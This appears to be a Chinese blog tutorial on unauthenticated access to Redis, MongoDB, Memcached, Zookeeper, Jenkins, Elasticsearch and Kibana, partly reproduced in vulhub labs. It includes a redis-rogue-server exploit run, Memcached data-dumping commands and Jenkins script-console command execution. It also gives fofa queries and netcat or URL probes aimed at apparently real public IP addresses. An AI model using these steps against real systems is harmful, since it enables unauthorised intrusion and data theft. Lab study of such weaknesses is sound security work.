未授权访问漏洞系列

ops/2024/11/15 5:49:39/

环境

1.此漏洞需要靶场vulhub,可自行前往gethub下载

2.需要虚拟机或云服务器等linux系统,并在此系统安装docker和docker-compose提供环境支持

3.运行docker-compose指令为docker-compose up -d即可运行当前目录下的文件

Redis未授权访问漏洞

一、进入vulhub启动docker镜像

cd /vulhub-master/redis/4-unacc

启动docker

二、在系统安装redis,见上图

redis链接6379为redis的默认端口

redis-cli -h 192.168.4.176 -p 6379

即可链接成功

三、可以直接连接执行命令且不需要认证说明存在未授权访问漏洞----->下载以下攻击项目…

 git clone https://github.com/n0b0dyCN/redis-rogue-server.git 

四、使用py脚本攻击redis

python3 redis-rogue-server.py --rhost 192.168.30.138 --lhost 192.168.30.129

博主只有一台云服务器连不上,不想搞两个linux系统了,这个实验先这样吧

MongoDB未授权访问漏洞

拉取镜像:docker pull mongo
启动镜像docker run -d -p 27017:27017  mongo
查看镜像:docker ps -a

漏洞利用

使用Navicat进行连接.

实例 可以在fofo里搜索 port="27017",去找一个连一下试一试,不过别犯法了

Memcached未授权访问漏洞

下载Memcached程序并执行以下命令---->启动Memcached漏洞环境

下载地址:
https://www.runoob.com/memcached/window-install-memcached.html
#执行命令
memcached.exe -d install
memcached.exe -d start

步骤二使用Telnet程序探测目标的11211端口.

#Telnet探测
telnet 192.168.4.199 11211
#操作命令
stats //查看memcache服务状态
stats items //查看所有items
stats cachedump 390//获得缓存key
get:state:264861539228401373:261588//通过key读取相应value获得实际缓存内容,造
成敏感信息泄露

用fofa语法 port="11211"搜索

Zookeeper未授权访问漏洞

port="2181"搜索资产

可以使用以下语句

echo envi | nc 114.242.175.75 2181
echo envi | nc 223.5.253.242 2181

使用Zookeeper可视化管理工具进行连接

#工具下载
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

Jenkins未授权访问漏洞

使用以下fofa语法进行产品搜索

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

在打开的URL中.点击 Manage Jenkins–>Scritp Console 在执行以下命令

#执行命令
println "whoami".execute().text  
#命令执行页面
http://125.63.109.2:8080/manage/script/index.php

靶场复现流程

wget http://archives.jenkins-ci.org/redhat/jenkins-1.620-1.1.noarch.rpm
下载

rpm -ivh jenkins-1.620-1.1.noarch.rpm
安装
service jenkins start
启动
关防火墙
systemctl stop firewalld.service

访问服务地址

http://1.92.134.1:8080/manage
http://1.92.134.1:8080/script

#执行命令
println "whoami".execute().text  

Elasticsearch未授权访问漏洞

搜索语法

"Elasticsearch" && port="9200"

存在未授权访问则直接进入到信息页面…不需要输入用户密码登陆

#访问测试
http://localhost:9200/_plugin/head/web管理界面
http://localhost:9200/cat/indices
http://localhost:9200/river/search 查看数据库敏感信息
http://localhost:9200/nodes查看节点数据

Kibana未授权访问漏洞

搜索语句

"kibana" && port="5601"

无需登录访问即存在未授权访问漏洞

Docker Remote APl未授权访问漏洞

port="8080" && app="Kubernetes"


http://www.ppmy.cn/ops/90011.html

相关文章

UE5 大鹅的点击移动 第三人称

文章目录 一、创建动画蓝图二、创建 Location 地标三、Character 和 PlayerControl 的控制四、实现效果 一、创建动画蓝图 这里以 UE5 从零开始制作跟随的大鹅-CSDN博客 创建的动态资产创建动画蓝图;需要用到的资产列表有:大鹅的骨骼网格体,…

2024 7.29~8.4 周报

一、上周工作 2024 7.22~7.28周报-CSDN博客 二、本周计划 修改论文 三、完成情况 3.1 论文修改 3.1.1 摘要 问题:所写问题是一般性的深度网络问题(过拟合),并没有针对FWI的问题(边缘不清晰、深层不清晰、速度慢…

解决VideoReader出现Thread worker: Error sending packet报错

问题现象:对于个别视频,单独读取该视频是正常,使用decord中的VideoReader读取会报如下的错误: [06:56:29] /github/workspace/src/video/ffmpeg/threaded_decoder.cc:292: [06:56:29] /github/workspace/src/video/ffmpeg/threade…

【Android】Kotlin实现选取相片拍照截图图片上传(兼容android 9-14)(超详细完整版)

需求 技术栈 : android 原生 & kotlin 1.6.20 需求 : ① 选取相片&拍照 ② 截图(CropImage) ③ 上传图片(含网络接口请求封装) 代码 一. build.gradle (Module: app) 配置依赖 // 网络请求implementation com.squareup.okhttp3:okhttp:4.9.0implementation "co…

Jmeter--http信息头管理器的使用(转载)

本文转载自: Jmeter—什么时候需要配置HTTP信息头管理器以及对应的参数如何输入_信息头管理器中的参数怎么调用-CSDN博客 1、抓包查看Request Headers(请求头)里Content-Type的信息,如下图: Content-Type的格式为&…

C#—串口和网口之间的通信详解

C#—串口和网口之间的通信 串口转网口、网口转串口,就是将网口发送来的数据包发送给串口设备,将串口设备返回的数据转发给网口客户端。 在C#中,将串口数据转换为网络数据并发送到网络,通常涉及以下步骤: 1. 创建一个…

前端构建工具Webpack 与 Vite 大对比

在现代前端开发领域,构建工具扮演着至关重要的角色。它们不仅可以帮助我们管理项目依赖关系,还可以优化我们的代码,使其在生产环境中运行得更快更高效。其中两个最受欢迎的构建工具就是 Webpack 和 Vite。在这篇文章中,我们将深入…

Go 语言中操作映射

1. 定义映射 大多数主流编程语言都支持映射,因为它们可以说是存储数据的最重要的数据结构之一。映射是成对值的集合,在每对值中,其中一个称为 “键” ,另一个则为它对应的 “值”。 可以使用映射的键来引用它对应的值,…